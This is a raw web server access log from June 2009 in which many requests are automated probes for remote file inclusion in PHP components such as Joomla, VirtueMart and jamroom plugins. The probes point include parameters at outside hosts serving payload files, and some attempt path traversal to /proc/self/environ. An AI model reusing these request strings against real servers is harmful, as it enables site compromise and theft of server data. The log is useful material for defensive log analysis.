209.68.2.99 - - [29/Jun/2009:01:01:42 -0700] "GET /logs/access.log%20/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:03:01 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:03:01 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:03:01 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
72.14.199.8 - - [29/Jun/2009:01:06:50 -0700] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:01:06:54 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
66.163.171.206 - - [29/Jun/2009:01:07:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.16.83.70 - - [29/Jun/2009:01:07:55 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
87.16.83.70 - - [29/Jun/2009:01:08:01 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
87.16.83.70 - - [29/Jun/2009:01:08:01 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [29/Jun/2009:01:08:59 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
89.223.3.98 - - [29/Jun/2009:01:08:59 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
89.223.3.98 - - [29/Jun/2009:01:08:59 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:09:00 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:09:01 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:09:01 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:01:10:28 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:01:10:28 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:01:10:28 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:10:52 -0700] "GET /logs/access_090112.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [29/Jun/2009:01:15:05 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [29/Jun/2009:01:15:05 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [29/Jun/2009:01:15:05 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:17 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:17 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:21 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:21 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:21 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:55 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:55 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:15:55 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:01:19:35 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:01:19:35 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:01:19:35 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:01:20:13 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:21:53 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:21:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:21:53 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:25:10 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [29/Jun/2009:01:27:58 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [29/Jun/2009:01:52:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.16.83.70 - - [29/Jun/2009:01:54:08 -0700] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
87.16.83.70 - - [29/Jun/2009:01:54:08 -0700] "GET /lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
87.16.83.70 - - [29/Jun/2009:01:54:08 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [29/Jun/2009:01:58:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.197.183.69 - - [29/Jun/2009:02:09:25 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
66.197.183.69 - - [29/Jun/2009:02:13:17 -0700] "GET /logs/access.log//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
66.197.183.69 - - [29/Jun/2009:02:13:17 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
66.197.183.69 - - [29/Jun/2009:02:13:17 -0700] "GET /logs//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:02:20:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
76.13.114.105 - - [29/Jun/2009:02:21:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:24:38 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:24:38 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:24:38 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:24:46 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:24:46 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:24:46 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:25:52 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:25:52 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:25:53 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:26:54 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:26:55 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:26:56 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:28:53 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:29:16 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:30:02 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:02:30:13 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
91.198.32.3 - - [29/Jun/2009:02:37:54 -0700] "GET /logs/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.198.32.3 - - [29/Jun/2009:02:37:54 -0700] "GET /logs/access_090112.log/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.198.32.3 - - [29/Jun/2009:02:37:54 -0700] "GET /!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:02:40:51 -0700] "GET /!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:02:40:51 -0700] "GET /logs/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:02:40:51 -0700] "GET /logs/access_090112.log/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
216.246.98.115 - - [29/Jun/2009:02:43:06 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
216.246.98.115 - - [29/Jun/2009:02:43:06 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
216.246.98.115 - - [29/Jun/2009:02:43:07 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.189.18.73 - - [29/Jun/2009:02:44:20 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
211.189.18.73 - - [29/Jun/2009:02:44:20 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
211.189.18.73 - - [29/Jun/2009:02:44:20 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.246.98.115 - - [29/Jun/2009:02:44:20 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
216.246.98.115 - - [29/Jun/2009:02:44:20 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
216.246.98.115 - - [29/Jun/2009:02:44:21 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
87.16.83.70 - - [29/Jun/2009:02:50:11 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [29/Jun/2009:02:55:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.246.98.115 - - [29/Jun/2009:03:00:09 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
